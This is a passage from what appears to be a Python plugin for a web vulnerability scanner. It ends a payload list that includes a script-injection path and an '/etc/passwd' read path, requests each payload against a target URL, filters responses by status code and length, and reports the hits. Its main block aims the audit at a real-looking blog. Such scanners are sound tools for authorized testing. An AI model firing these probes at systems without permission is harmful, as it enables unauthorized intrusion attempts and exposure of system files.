~/<script>alert('Vulnerable')</script>.aspx
~nobody/etc/passwd'''
    ditPayload = []
    lenCount = []
    for item in payload.strip().splitlines():
        target_url = arg + item
        try:
            code, head, body, redirect, log = hackhttp.http(target_url)

            if code != 404 and code != 400:
                dictpayload =dict()
                dictpayload["code"] = code
                dictpayload["url"] = target_url
                dictpayload["len"] = len(body)
                debug("[renrensaoFuzz] code:%d url:%s len:%d"%(code,target_url,len(body)))
                lenCount.append(dictpayload["len"])

                ditPayload.append(dictpayload)
        except Exception as info_error:
            pass
    # sort
    newT = sorted(ditPayload, key=lambda s: s["len"],reverse=False)

    #find out of the max len and remove it
    lenDict = {}
    for i in lenCount:
        if lenCount.count(i) > 1:
            lenDict[i] = lenCount.count(i)
    max = 1
    maxK = ""
    for k,v in lenDict.items():
        if v > max:
            max = v
            maxK = k
    newlist = []
    
    for i in newT:
        if i["len"] == maxK:
            continue
        security_note("url:%s code:%d len:%d" % (i["url"], i["code"], i["len"]),"renrensaoFuzz")

if __name__ == '__main__':
    from dummy import *
    audit(assign("www","https://blog.hacking8.com/")[1])